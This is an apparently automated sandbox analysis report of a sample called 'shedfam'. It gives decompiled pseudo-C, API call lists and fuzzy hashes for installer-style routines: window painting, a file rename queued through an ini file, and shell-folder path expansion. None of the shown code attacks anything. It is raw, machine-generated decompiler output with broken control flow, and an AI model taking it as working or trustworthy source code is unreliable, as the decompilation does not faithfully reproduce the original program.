                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                  • String ID: /B$N$open
                                                                  • API String ID: 3615053054-636633259
                                                                  • Opcode ID: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                                  • Instruction ID: 4ef5deaae8a6f16a89100f2c462af89a3ec6633dbf44de90af8596516ef02dbc
                                                                  • Opcode Fuzzy Hash: 43ac380643fe876a126a7d51a79fcde76a62781ede984e71abdbe97e8442c5f6
                                                                  • Instruction Fuzzy Hash: 85619FB1A40209BBEB109F60DD45F6A7B79FB44715F108036FB05BA2D1C7B8A951CF98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 90%
                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                  				struct tagLOGBRUSH _v16;
                                                                  				struct tagRECT _v32;
                                                                  				struct tagPAINTSTRUCT _v96;
                                                                  				struct HDC__* _t70;
                                                                  				struct HBRUSH__* _t87;
                                                                  				struct HFONT__* _t94;
                                                                  				long _t102;
                                                                  				signed int _t126;
                                                                  				struct HDC__* _t128;
                                                                  				intOrPtr _t130;
                                                                  
                                                                  				if(_a8 == 0xf) {
                                                                  					_t130 =  *0x423f90;
                                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                  					_a8 = _t70;
                                                                  					GetClientRect(_a4,  &_v32);
                                                                  					_t126 = _v32.bottom;
                                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                                  					while(_v32.top < _t126) {
                                                                  						_a12 = _t126 - _v32.top;
                                                                  						asm("cdq");
                                                                  						asm("cdq");
                                                                  						asm("cdq");
                                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                                  						_v32.bottom = _v32.bottom + 4;
                                                                  						_a16 = _t87;
                                                                  						FillRect(_a8,  &_v32, _t87);
                                                                  						DeleteObject(_a16);
                                                                  						_v32.top = _v32.top + 4;
                                                                  					}
                                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                  						_a16 = _t94;
                                                                  						if(_t94 != 0) {
                                                                  							_t128 = _a8;
                                                                  							_v32.left = 0x10;
                                                                  							_v32.top = 8;
                                                                  							SetBkMode(_t128, 1);
                                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                  							_a8 = SelectObject(_t128, _a16);
                                                                  							DrawTextA(_t128, 0x423780, 0xffffffff,  &_v32, 0x820);
                                                                  							SelectObject(_t128, _a8);
                                                                  							DeleteObject(_a16);
                                                                  						}
                                                                  					}
                                                                  					EndPaint(_a4,  &_v96);
                                                                  					return 0;
                                                                  				}
                                                                  				_t102 = _a16;
                                                                  				if(_a8 == 0x46) {
                                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x423f88;
                                                                  				}
                                                                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                  			}













                                                                  0x0040100a
                                                                  0x00401039
                                                                  0x00401047
                                                                  0x0040104d
                                                                  0x00401051
                                                                  0x0040105b
                                                                  0x00401061
                                                                  0x00401064
                                                                  0x004010f3
                                                                  0x00401089
                                                                  0x0040108c
                                                                  0x004010a6
                                                                  0x004010bd
                                                                  0x004010cc
                                                                  0x004010cf
                                                                  0x004010d5
                                                                  0x004010d9
                                                                  0x004010e4
                                                                  0x004010ed
                                                                  0x004010ef
                                                                  0x004010ef
                                                                  0x00401100
                                                                  0x00401105
                                                                  0x0040110d
                                                                  0x00401110
                                                                  0x00401112
                                                                  0x00401118
                                                                  0x0040111f
                                                                  0x00401126
                                                                  0x00401130
                                                                  0x00401142
                                                                  0x00401156
                                                                  0x00401160
                                                                  0x00401165
                                                                  0x00401165
                                                                  0x00401110
                                                                  0x0040116e
                                                                  0x00000000
                                                                  0x00401178
                                                                  0x00401010
                                                                  0x00401013
                                                                  0x00401015
                                                                  0x0040101f
                                                                  0x0040101f
                                                                  0x00000000

                                                                  APIs
                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                  • FillRect.USER32 ref: 004010E4
                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                  • DrawTextA.USER32(00000000,00423780,000000FF,00000010,00000820), ref: 00401156
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                  • String ID: F
                                                                  • API String ID: 941294808-1304234792
                                                                  • Opcode ID: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                                  • Instruction ID: 5ee0eae5ae25bcf212c08558168c62b52fbe6696795006813c9da87f91bafb02
                                                                  • Opcode Fuzzy Hash: 0ba65d1a2a762be62a9a1f423a7220532c78570fd4983bed9b69ad4ea6e65a72
                                                                  • Instruction Fuzzy Hash: 00419A71804249AFCB058F94DD459AFBBB9FF44315F00812AF961AA2A0C738AA50DFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 93%
                                                                  			E00405A49(void* __eflags) {
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr* _t15;
                                                                  				long _t16;
                                                                  				int _t20;
                                                                  				void* _t28;
                                                                  				long _t29;
                                                                  				intOrPtr* _t37;
                                                                  				int _t43;
                                                                  				void* _t44;
                                                                  				long _t47;
                                                                  				CHAR* _t49;
                                                                  				void* _t51;
                                                                  				void* _t53;
                                                                  				intOrPtr* _t54;
                                                                  				void* _t55;
                                                                  				void* _t56;
                                                                  
                                                                  				_t15 = E00406087(2);
                                                                  				_t49 =  *(_t55 + 0x18);
                                                                  				if(_t15 != 0) {
                                                                  					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                                                                  					if(_t20 != 0) {
                                                                  						L16:
                                                                  						 *0x424010 =  *0x424010 + 1;
                                                                  						return _t20;
                                                                  					}
                                                                  				}
                                                                  				 *0x422710 = 0x4c554e;
                                                                  				if(_t49 == 0) {
                                                                  					L5:
                                                                  					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422188, 0x400);
                                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                                  						_t43 = wsprintfA(0x421d88, "%s=%s\r\n", 0x422710, 0x422188);
                                                                  						_t56 = _t55 + 0x10;
                                                                  						E00405D1D(_t43, 0x400, 0x422188, 0x422188,  *((intOrPtr*)( *0x423f90 + 0x128)));
                                                                  						_t20 = E004059D2(0x422188, 0xc0000000, 4);
                                                                  						_t53 = _t20;
                                                                  						 *(_t56 + 0x14) = _t53;
                                                                  						if(_t53 == 0xffffffff) {
                                                                  							goto L16;
                                                                  						}
                                                                  						_t47 = GetFileSize(_t53, 0);
                                                                  						_t7 = _t43 + 0xa; // 0xa
                                                                  						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                                                                  						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                                                                  							L15:
                                                                  							_t20 = CloseHandle(_t53);
                                                                  							goto L16;
                                                                  						} else {
                                                                  							if(E00405947(_t51, "[Rename]\r\n") != 0) {
                                                                  								_t28 = E00405947(_t26 + 0xa, 0x409424);
                                                                  								if(_t28 == 0) {
                                                                  									L13:
                                                                  									_t29 = _t47;
                                                                  									L14:
                                                                  									E00405993(_t51 + _t29, 0x421d88, _t43);
                                                                  									SetFilePointer(_t53, 0, 0, 0);
                                                                  									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                                                                  									GlobalFree(_t51);
                                                                  									goto L15;
                                                                  								}
                                                                  								_t37 = _t28 + 1;
                                                                  								_t44 = _t51 + _t47;
                                                                  								_t54 = _t37;
                                                                  								if(_t37 >= _t44) {
                                                                  									L21:
                                                                  									_t53 =  *(_t56 + 0x14);
                                                                  									_t29 = _t37 - _t51;
                                                                  									goto L14;
                                                                  								} else {
                                                                  									goto L20;
                                                                  								}
                                                                  								do {
                                                                  									L20:
                                                                  									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                  									_t54 = _t54 + 1;
                                                                  								} while (_t54 < _t44);
                                                                  								goto L21;
                                                                  							}
                                                                  							E00405CFB(_t51 + _t47, "[Rename]\r\n");
                                                                  							_t47 = _t47 + 0xa;
                                                                  							goto L13;
                                                                  						}
                                                                  					}
                                                                  				} else {
                                                                  					CloseHandle(E004059D2(_t49, 0, 1));
                                                                  					_t16 = GetShortPathNameA(_t49, 0x422710, 0x400);
                                                                  					if(_t16 != 0 && _t16 <= 0x400) {
                                                                  						goto L5;
                                                                  					}
                                                                  				}
                                                                  				return _t16;
                                                                  			}





















                                                                  0x00405a4f
                                                                  0x00405a56
                                                                  0x00405a5a
                                                                  0x00405a63
                                                                  0x00405a67
                                                                  0x00405ba6
                                                                  0x00405ba6
                                                                  0x00000000
                                                                  0x00405ba6
                                                                  0x00405a67
                                                                  0x00405a73
                                                                  0x00405a89
                                                                  0x00405ab1
                                                                  0x00405abc
                                                                  0x00405ac0
                                                                  0x00405ae0
                                                                  0x00405ae7
                                                                  0x00405af1
                                                                  0x00405afe
                                                                  0x00405b03
                                                                  0x00405b08
                                                                  0x00405b0c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405b1b
                                                                  0x00405b1d
                                                                  0x00405b2a
                                                                  0x00405b2e
                                                                  0x00405b9f
                                                                  0x00405ba0
                                                                  0x00000000
                                                                  0x00405b4a
                                                                  0x00405b57
                                                                  0x00405bbc
                                                                  0x00405bc3
                                                                  0x00405b6a
                                                                  0x00405b6a
                                                                  0x00405b6c
                                                                  0x00405b75
                                                                  0x00405b80
                                                                  0x00405b92
                                                                  0x00405b99
                                                                  0x00000000
                                                                  0x00405b99
                                                                  0x00405bc5
                                                                  0x00405bc6
                                                                  0x00405bcb
                                                                  0x00405bcd
                                                                  0x00405bda
                                                                  0x00405bda
                                                                  0x00405bde
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405bcf
                                                                  0x00405bcf
                                                                  0x00405bd2
                                                                  0x00405bd5
                                                                  0x00405bd6
                                                                  0x00000000
                                                                  0x00405bcf
                                                                  0x00405b62
                                                                  0x00405b67
                                                                  0x00000000
                                                                  0x00405b67
                                                                  0x00405b2e
                                                                  0x00405a8b
                                                                  0x00405a96
                                                                  0x00405a9f
                                                                  0x00405aa3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405aa3
                                                                  0x00405bb0

                                                                  APIs
                                                                    • Part of subcall function 00406087: GetModuleHandleA.KERNEL32(?,?,00000000,004032BB,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00406099
                                                                    • Part of subcall function 00406087: GetProcAddress.KERNEL32(00000000,?), ref: 004060B4
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,004057DE,?,00000000,000000F1,?), ref: 00405A96
                                                                  • GetShortPathNameA.KERNEL32 ref: 00405A9F
                                                                  • GetShortPathNameA.KERNEL32 ref: 00405ABC
                                                                  • wsprintfA.USER32 ref: 00405ADA
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00422188,C0000000,00000004,00422188,?,?,?,00000000,000000F1,?), ref: 00405B15
                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B24
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B3A
                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D88,00000000,-0000000A,00409424,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405B80
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405B92
                                                                  • GlobalFree.KERNEL32 ref: 00405B99
                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BA0
                                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                                    • Part of subcall function 00405947: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_shedfam.jbxd
                                                                  Similarity
                                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                  • String ID: %s=%s$[Rename]
                                                                  • API String ID: 3445103937-1727408572
                                                                  • Opcode ID: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                                  • Instruction ID: d3b858f9c50fd1002edea1203351e8dfee5eb830211114c78627ca8ef1b38bc0
                                                                  • Opcode Fuzzy Hash: 33756e72fd6f1d9250d3b45ccd1eb6e8d37fe10fc7839c9b0644593744dd0e34
                                                                  • Instruction Fuzzy Hash: 2B41FF71A45A15BBD7206B619D49F6B3AACEF80754F140436FE05F22C2E67CBC018EAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 74%
                                                                  			E00405D1D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                  				signed int _v8;
                                                                  				struct _ITEMIDLIST* _v12;
                                                                  				signed int _v16;
                                                                  				signed char _v20;
                                                                  				signed int _v24;
                                                                  				signed char _v28;
                                                                  				signed int _t36;
                                                                  				CHAR* _t37;
                                                                  				signed int _t39;
                                                                  				int _t40;
                                                                  				char _t50;
                                                                  				char _t51;
                                                                  				char _t53;
                                                                  				char _t55;
                                                                  				void* _t63;
                                                                  				signed int _t69;
                                                                  				signed int _t74;
                                                                  				signed int _t75;
                                                                  				char _t83;
                                                                  				void* _t85;
                                                                  				CHAR* _t86;
                                                                  				void* _t88;
                                                                  				signed int _t95;
                                                                  				signed int _t97;
                                                                  				void* _t98;
                                                                  
                                                                  				_t88 = __esi;
                                                                  				_t85 = __edi;
                                                                  				_t63 = __ebx;
                                                                  				_t36 = _a8;
                                                                  				if(_t36 < 0) {
                                                                  					_t36 =  *( *0x42375c - 4 + _t36 * 4);
                                                                  				}
                                                                  				_t74 =  *0x423fb8 + _t36;
                                                                  				_t37 = 0x422f20;
                                                                  				_push(_t63);
                                                                  				_push(_t88);
                                                                  				_push(_t85);
                                                                  				_t86 = 0x422f20;
                                                                  				if(_a4 - 0x422f20 < 0x800) {
                                                                  					_t86 = _a4;
                                                                  					_a4 = _a4 & 0x00000000;
                                                                  				}
                                                                  				while(1) {
                                                                  					_t83 =  *_t74;
                                                                  					if(_t83 == 0) {
                                                                  						break;
                                                                  					}
                                                                  					__eflags = _t86 - _t37 - 0x400;
                                                                  					if(_t86 - _t37 >= 0x400) {
                                                                  						break;
                                                                  					}
                                                                  					_t74 = _t74 + 1;
                                                                  					__eflags = _t83 - 0xfc;
                                                                  					_a8 = _t74;
                                                                  					if(__eflags <= 0) {
                                                                  						if(__eflags != 0) {
                                                                  							 *_t86 = _t83;
                                                                  							_t86 =  &(_t86[1]);
                                                                  							__eflags = _t86;
                                                                  						} else {
                                                                  							 *_t86 =  *_t74;
                                                                  							_t86 =  &(_t86[1]);
                                                                  							_t74 = _t74 + 1;
                                                                  						}
                                                                  						continue;
                                                                  					}
                                                                  					_t39 =  *(_t74 + 1);
                                                                  					_t75 =  *_t74;
                                                                  					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                                                  					_a8 = _a8 + 2;
                                                                  					_v28 = _t75 | 0x00000080;
                                                                  					_t69 = _t75;
                                                                  					_v24 = _t69;
                                                                  					__eflags = _t83 - 0xfe;
                                                                  					_v20 = _t39 | 0x00000080;
                                                                  					_v16 = _t39;
                                                                  					if(_t83 != 0xfe) {
                                                                  						__eflags = _t83 - 0xfd;
                                                                  						if(_t83 != 0xfd) {
                                                                  							__eflags = _t83 - 0xff;
                                                                  							if(_t83 == 0xff) {
                                                                  								__eflags = (_t39 | 0xffffffff) - _t95;
                                                                  								E00405D1D(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                                                  							}
                                                                  							L41:
                                                                  							_t40 = lstrlenA(_t86);
                                                                  							_t74 = _a8;
                                                                  							_t86 =  &(_t86[_t40]);
                                                                  							_t37 = 0x422f20;
                                                                  							continue;
                                                                  						}
                                                                  						__eflags = _t95 - 0x1d;
                                                                  						if(_t95 != 0x1d) {
                                                                  							__eflags = (_t95 << 0xa) + 0x425000;
                                                                  							E00405CFB(_t86, (_t95 << 0xa) + 0x425000);
                                                                  						} else {
                                                                  							E00405C59(_t86,  *0x423f88);
                                                                  						}
                                                                  						__eflags = _t95 + 0xffffffeb - 7;
                                                                  						if(_t95 + 0xffffffeb < 7) {
                                                                  							L32:
                                                                  							E00405F5D(_t86);
                                                                  						}
                                                                  						goto L41;
                                                                  					}
                                                                  					_t97 = 2;
                                                                  					_t50 = GetVersion();
                                                                  					__eflags = _t50;
                                                                  					if(_t50 >= 0) {
                                                                  						L12:
                                                                  						_v8 = 1;
                                                                  						L13:
                                                                  						__eflags =  *0x424004;
                                                                  						if( *0x424004 != 0) {
                                                                  							_t97 = 4;
                                                                  						}
                                                                  						__eflags = _t69;
                                                                  						if(_t69 >= 0) {
                                                                  							__eflags = _t69 - 0x25;
                                                                  							if(_t69 != 0x25) {
                                                                  								__eflags = _t69 - 0x24;
                                                                  								if(_t69 == 0x24) {
                                                                  									GetWindowsDirectoryA(_t86, 0x400);
                                                                  									_t97 = 0;
                                                                  								}
                                                                  								while(1) {
                                                                  									__eflags = _t97;
                                                                  									if(_t97 == 0) {
                                                                  										goto L29;
                                                                  									}
                                                                  									_t51 =  *0x423f84;
                                                                  									_t97 = _t97 - 1;
                                                                  									__eflags = _t51;
                                                                  									if(_t51 == 0) {
                                                                  										L25:
                                                                  										_t53 = SHGetSpecialFolderLocation( *0x423f88,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                                                  										__eflags = _t53;
                                                                  										if(_t53 != 0) {
                                                                  											L27:
                                                                  											 *_t86 =  *_t86 & 0x00000000;
                                                                  											__eflags =  *_t86;
                                                                  											continue;
                                                                  										}
                                                                  										__imp__SHGetPathFromIDListA(_v12, _t86);
                                                                  										__imp__CoTaskMemFree(_v12);
                                                                  										__eflags = _t53;
                                                                  										if(_t53 != 0) {
                                                                  											goto L29;
                                                                  										}
                                                                  										goto L27;
                                                                  									}
                                                                  									__eflags = _v8;
                                                                  									if(_v8 == 0) {
                                                                  										goto L25;
                                                                  									}
                                                                  									_t55 =  *_t51( *0x423f88,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                                                  									__eflags = _t55;
                                                                  									if(_t55 == 0) {
                                                                  										goto L29;
                                                                  									}
                                                                  									goto L25;
                                                                  								}
                                                                  								goto L29;
                                                                  							}
                                                                  							GetSystemDirectoryA(_t86, 0x400);
                                                                  							goto L29;
                                                                  						} else {
                                                                  							_t72 = (_t69 & 0x0000003f) +  *0x423fb8;
                                                                  							E00405BE2(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423fb8, _t86, _t69 & 0x00000040);
                                                                  							__eflags =  *_t86;
                                                                  							if( *_t86 != 0) {
                                                                  								L30:
                                                                  								__eflags = _v16 - 0x1a;
                                                                  								if(_v16 == 0x1a) {
                                                                  									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                  								}
                                                                  								goto L32;
                                                                  							}
                                                                  							E00405D1D(_t72, _t86, _t97, _t86, _v16);
                                                                  							L29:
                                                                  							__eflags =  *_t86;
                                                                  							if( *_t86 == 0) {
                                                                  								goto L32;
                                                                  							}
                                                                  							goto L30;
                                                                  						}
                                                                  					}
                                                                  					__eflags = _t50 - 0x5a04;
                                                                  					if(_t50 == 0x5a04) {
                                                                  						goto L12;
                                                                  					}
                                                                  					__eflags = _v16 - 0x23;
                                                                  					if(_v16 == 0x23) {
                                                                  						goto L12;
                                                                  					}
                                                                  					__eflags = _v16 - 0x2e;
                                                                  					if(_v16 == 0x2e) {
                                                                  						goto L12;
                                                                  					} else {
                                                                  						_v8 = _v8 & 0x00000000;
                                                                  						goto L13;
                                                                  					}
                                                                  				}
                                                                  				 *_t86 =  *_t86 & 0x00000000;
                                                                  				if(_a4 == 0) {
                                                                  					return _t37;
                                                                  				}
                                                                  				return E00405CFB(_a4, _t37);
                                                                  			}




























                                                                  0x00405d1d
                                                                  0x00405d1d
                                                                  0x00405d1d
                                                                  0x00405d23
                                                                  0x00405d28
                                                                  0x00405d39
                                                                  0x00405d39
                                                                  0x00405d44
                                                                  0x00405d46
                                                                  0x00405d4b
                                                                  0x00405d4e
                                                                  0x00405d4f
                                                                  0x00405d56
                                                                  0x00405d58
                                                                  0x00405d5e
                                                                  0x00405d61
                                                                  0x00405d61
                                                                  0x00405f3a
                                                                  0x00405f3a
                                                                  0x00405f3e
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405d6e
                                                                  0x00405d74
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405d7a
                                                                  0x00405d7b
                                                                  0x00405d7e
                                                                  0x00405d81
                                                                  0x00405f2d
                                                                  0x00405f37
                                                                  0x00405f39
                                                                  0x00405f39
                                                                  0x00405f2f
                                                                  0x00405f31
                                                                  0x00405f33
                                                                  0x00405f34
                                                                  0x00405f34
                                                                  0x00000000
                                                                  0x00405f2d
                                                                  0x00405d87
                                                                  0x00405d8b
                                                                  0x00405d9b
                                                                  0x00405d9f
                                                                  0x00405da6
                                                                  0x00405da9
                                                                  0x00405dad
                                                                  0x00405db3
                                                                  0x00405db6
                                                                  0x00405db9
                                                                  0x00405dbc
                                                                  0x00405ed7
                                                                  0x00405eda
                                                                  0x00405f0a
                                                                  0x00405f0d
                                                                  0x00405f12
                                                                  0x00405f16
                                                                  0x00405f16
                                                                  0x00405f1b
                                                                  0x00405f1c
                                                                  0x00405f21
                                                                  0x00405f24
                                                                  0x00405f26
                                                                  0x00000000
                                                                  0x00405f26
                                                                  0x00405edc
                                                                  0x00405edf
                                                                  0x00405ef4
                                                                  0x00405efb
                                                                  0x00405ee1
                                                                  0x00405ee8
                                                                  0x00405ee8
                                                                  0x00405f03
                                                                  0x00405f06
                                                                  0x00405ecf
                                                                  0x00405ed0
                                                                  0x00405ed0
                                                                  0x00000000
                                                                  0x00405f06
                                                                  0x00405dc4
                                                                  0x00405dc5
                                                                  0x00405dcb
                                                                  0x00405dcd
                                                                  0x00405de7
                                                                  0x00405de7
                                                                  0x00405dee
                                                                  0x00405dee
                                                                  0x00405df5
                                                                  0x00405df9
                                                                  0x00405df9
                                                                  0x00405dfa
                                                                  0x00405dfc
                                                                  0x00405e35
                                                                  0x00405e38
                                                                  0x00405e48
                                                                  0x00405e4b
                                                                  0x00405e53
                                                                  0x00405e59
                                                                  0x00405e59
                                                                  0x00405eb5
                                                                  0x00405eb5
                                                                  0x00405eb7
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405e5d
                                                                  0x00405e64
                                                                  0x00405e65
                                                                  0x00405e67
                                                                  0x00405e81
                                                                  0x00405e8f
                                                                  0x00405e95
                                                                  0x00405e97
                                                                  0x00405eb2
                                                                  0x00405eb2
                                                                  0x00405eb2
                                                                  0x00000000
                                                                  0x00405eb2
                                                                  0x00405e9d
                                                                  0x00405ea8
                                                                  0x00405eae
                                                                  0x00405eb0
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405eb0
                                                                  0x00405e69
                                                                  0x00405e6c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405e7b
                                                                  0x00405e7d
                                                                  0x00405e7f
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405e7f
                                                                  0x00000000
                                                                  0x00405eb5
                                                                  0x00405e40
                                                                  0x00000000
                                                                  0x00405dfe
                                                                  0x00405e03
                                                                  0x00405e19
                                                                  0x00405e1e
                                                                  0x00405e21
                                                                  0x00405ebe
                                                                  0x00405ebe
                                                                  0x00405ec2
                                                                  0x00405eca
                                                                  0x00405eca
                                                                  0x00000000
                                                                  0x00405ec2
                                                                  0x00405e2b
                                                                  0x00405eb9
                                                                  0x00405eb9
                                                                  0x00405ebc
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405ebc
                                                                  0x00405dfc
                                                                  0x00405dcf
                                                                  0x00405dd3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405dd5
                                                                  0x00405dd9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405ddb
                                                                  0x00405ddf
                                                                  0x00000000
                                                                  0x00405de1
                                                                  0x00405de1
                                                                  0x00000000
                                                                  0x00405de1
                                                                  0x00405ddf
                                                                  0x00405f44
                                                                  0x00405f4e
                                                                  0x00405f5a
                                                                  0x00405f5a
                                                                  0x00000000

                                                                  APIs
                                                                  • GetVersion.KERNEL32(?,0041FD58,00000000,0040501F,0041FD58,00000000), ref: 00405DC5
                                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405E40
                                                                  • GetWindowsDirectoryA.KERNEL32(00422F20,00000400), ref: 00405E53
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8F
                                                                  • SHGetPathFromIDListA.SHELL32(00000000,00422F20), ref: 00405E9D
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00405EA8
                                                                  • lstrcatA.KERNEL32(00422F20,\Microsoft\Internet Explorer\Quick Launch), ref: 00405ECA
